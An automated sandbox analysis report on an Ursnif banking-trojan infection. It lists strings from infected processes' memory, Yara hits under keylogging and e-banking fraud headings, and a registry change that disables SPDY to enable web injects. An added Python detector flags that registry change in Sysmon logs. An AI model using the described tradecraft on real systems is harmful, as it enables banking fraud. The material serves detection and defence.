            Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/favicon.ico
            Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/site/autoit/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml2.13.dr | String found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml3.13.dr | String found in binary or memory: http://www.live.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml4.13.dr | String found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml5.13.dr | String found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml6.13.dr | String found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml7.13.dr | String found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml8.13.dr | String found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
            Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://z.about.com/m/a08.ico

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 632, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match | File source: 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491933898.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.555836306.0000000004C60000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491904248.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.568586726.0000000005F20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.492017144.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000002.579706123.000000000051E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491990075.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.492004462.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.498916612.000000000591B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001D.00000003.574197225.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491965046.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491881653.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000020.00000003.579141799.000001B576620000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.491855597.0000000005A98000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3508, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4600, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 4292, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5436, type: MEMORY
            Source: Yara match | File source: Process Memory Space: control.exe PID: 632, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RuntimeBroker.exe PID: 3756, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)
            Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings, value EnableSPDY3_0 = 0
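            The SPDY registry change reported above is one of the few host artefacts in this report that a defender can alert on outside the sandbox: the value is written by explorer.exe, a process that has no reason to touch Internet Explorer's protocol settings, and the same explorer.exe is the target of the injection and Yara hits listed elsewhere on this page. The Python below is an added example, not part of the Joe Sandbox report or of Ursnif, that scans Sysmon Event ID 13 (registry value set) records for a non-browser process zeroing EnableSPDY3_0. The Sysmon XML records are constructed for the example, the SID in the key path is a placeholder, and the allow-list of expected writers (iexplore.exe only) is an assumption to be tuned per environment.

```python
"""Flag Sysmon Event ID 13 records in which a non-browser process zeroes
EnableSPDY3_0, the registry change reported in the analysis above."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Sysmon renders HKEY_CURRENT_USER as HKU\<SID>, so match on the tail of the
# path rather than on the hive name.
SPDY_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableSPDY3_0$",
    re.IGNORECASE,
)
DWORD_RE = re.compile(r"DWORD \(0x([0-9A-Fa-f]{8})\)")

# Assumption for this example: Internet Explorer itself is the only process
# expected to toggle the SPDY setting on a normal host.
EXPECTED_WRITERS = {"iexplore.exe"}


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    target: str


def _data(event: ET.Element, name: str) -> str:
    """Return the text of the <Data Name="..."> child, or "" if absent."""
    for d in event.iter(f"{NS}Data"):
        if d.get("Name") == name:
            return d.text or ""
    return ""


def find_spdy_tampering(xml_text: str) -> List[Finding]:
    """One Finding per Event ID 13 that sets EnableSPDY3_0 to 0 from an image
    outside EXPECTED_WRITERS."""
    findings: List[Finding] = []
    for ev in ET.fromstring(xml_text).iter(f"{NS}Event"):
        eid = ev.find(f"{NS}System/{NS}EventID")
        if eid is None or eid.text != "13":
            continue                      # not a RegistryEvent (Value Set)
        target = _data(ev, "TargetObject")
        if not SPDY_VALUE_RE.search(target):
            continue
        m = DWORD_RE.search(_data(ev, "Details"))
        if m is None or int(m.group(1), 16) != 0:
            continue                      # value left enabled: not the web-inject prep
        image = _data(ev, "Image")
        if image.rsplit("\\", 1)[-1].lower() in EXPECTED_WRITERS:
            continue
        findings.append(Finding(int(_data(ev, "ProcessId")), image, target))
    return findings


# Constructed Sysmon records in the shape Sysmon writes to the event log; the
# SID is a placeholder and none of these were captured from the sample.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID></System>
 <EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="Image">C:\Windows\explorer.exe</Data>
  <Data Name="ProcessId">3508</Data>
  <Data Name="TargetObject">HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0</Data>
  <Data Name="Details">DWORD (0x00000000)</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID></System>
 <EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="Image">C:\Program Files\Internet Explorer\iexplore.exe</Data>
  <Data Name="ProcessId">2210</Data>
  <Data Name="TargetObject">HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0</Data>
  <Data Name="Details">DWORD (0x00000000)</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID></System>
 <EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="Image">C:\Windows\explorer.exe</Data>
  <Data Name="ProcessId">3508</Data>
  <Data Name="TargetObject">HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0</Data>
  <Data Name="Details">DWORD (0x00000001)</Data>
 </EventData>
</Event>
</Events>"""

if __name__ == "__main__":
    for f in find_spdy_tampering(SAMPLE_EVENTS):
        print(f"SPDY disabled by PID {f.pid} ({f.image}): {f.target}")
```

            Two caveats on tuning. The user-facing "Use SPDY/3" option in Internet Options may be written by whichever process hosts the inetcpl.cpl dialog, which can be rundll32.exe rather than iexplore.exe; this report shows rundll32.exe and control.exe themselves carrying Ursnif code, so widening the allow-list to those images would have hidden the behaviour. Treat the registry event as a weak indicator and correlate it with the injection and Yara evidence on the same process rather than enlarging EXPECTED_WRITERS.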

            System Summary:

